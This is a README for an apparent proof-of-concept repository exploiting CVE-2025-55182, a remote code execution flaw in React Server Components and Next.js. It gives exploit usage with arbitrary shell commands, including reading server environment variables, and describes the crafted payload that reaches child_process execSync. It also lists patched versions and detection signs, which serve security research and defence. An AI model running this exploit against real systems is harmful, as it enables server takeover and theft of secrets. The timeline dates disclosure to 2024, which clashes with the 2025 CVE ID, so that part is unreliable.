This repository contains a proof of concept for CVE-2025-55182, a critical remote code execution vulnerability in React Server Components. This is for authorized security testing and research purposes only.
- CVE ID: CVE-2025-55182
- Name: React2Shell
- CVSS Score: 10.0 (CRITICAL)
- Type: CWE-502 - Deserialization of Untrusted Data
- Attack Vector: Network (AV:N)
- Authentication: None Required (PR:N)
- Status: Active exploitation in the wild
React:
- 19.0.0
- 19.1.0, 19.1.1
- 19.2.0
Next.js:
- 15.0.0 to 15.0.4
- 15.1.0 to 15.1.8
- 15.2.0 to 15.2.5
- 16.0.0 to 16.0.6
The vulnerability exploits unsafe deserialization in the React Server Components Flight protocol. When a server receives a specially crafted payload, it fails to properly validate the structure before deserializing, allowing attacker-controlled data to manipulate server-side execution.
- Fake Chunk Injection: Attacker sends a Flight payload with a crafted object mimicking internal Chunk structure
- Promise Handler Hijacking: The fake object includes a custom
thenmethod - State Manipulation: React's deserialization attempts to resolve the fake Chunk, triggering the attacker's handler
- Code Execution: Arbitrary JavaScript executes on the server via
process.mainModule.require('child_process')
- Node.js 18+
- Python 3.x (for exploit script)
- npm or yarn
- Install dependencies:
npm install- Start the vulnerable server:
npm run devThe server will start on http://localhost:3000
app/
├── page.js # Main page with ServerForm
├── ServerForm.js # Client component with form
├── actions.js # Vulnerable Server Action
└── layout.js # Root layout
For detailed exploitation guide including interactive shell and advanced features, see more-about-exploit.md
python3 exploit.py -t http://localhost:3000 -c "whoami"-t, --target: Target URL (required)-c, --command: Shell command to execute (default:id)--check-only: Only check if target appears vulnerable
Check if target is vulnerable:
python3 exploit.py -t http://localhost:3000 --check-onlyExecute arbitrary commands:
# Get user info
python3 exploit.py -t http://localhost:3000 -c "id"
# List files
python3 exploit.py -t http://localhost:3000 -c "ls -la"
# Create a file as POC
python3 exploit.py -t http://localhost:3000 -c "touch /tmp/pwned"
# Read environment variables
python3 exploit.py -t http://localhost:3000 -c "env"The exploit uses multipart form-data with:
Field "0": Malicious JSON with custom 'then' handler
Field "1": Reference to field 0 ($@0)
Header: Next-Action: x (triggers RSC processing)
The payload manipulates the internal _response object to execute:
process.mainModule.require("child_process").execSync("<command>");-
Update React:
npm install react@19.3.0 react-dom@19.3.0
-
Update Next.js:
npm install next@15.2.6 # or latest patched version
- React: ≥ 19.3.0
- Next.js:
- ≥ 15.0.5
- ≥ 15.1.9
- ≥ 15.2.6
- ≥ 16.0.7
- Unexpected POST requests to RSC endpoints with
Next-Actionheader - Multipart form-data payloads with
$@references - Suspicious
thenproperties in request bodies - Server-side process execution anomalies
POST / HTTP/1.1
Next-Action: x
Content-Type: multipart/form-data
...containing {"then":"$@
- December 3, 2024: Public disclosure
- December 5, 2024: Active exploitation observed
- December 26, 2024: CISA KEV compliance deadline
This proof of concept is provided for educational and authorized security testing purposes only. Unauthorized access to computer systems is illegal. The authors assume no liability for misuse of this information.
DO NOT:
- Use this exploit against systems you don't own or have explicit permission to test
- Deploy this in production environments
- Share exploit code without proper context and warnings
MIT License - For Security Research Purposes Only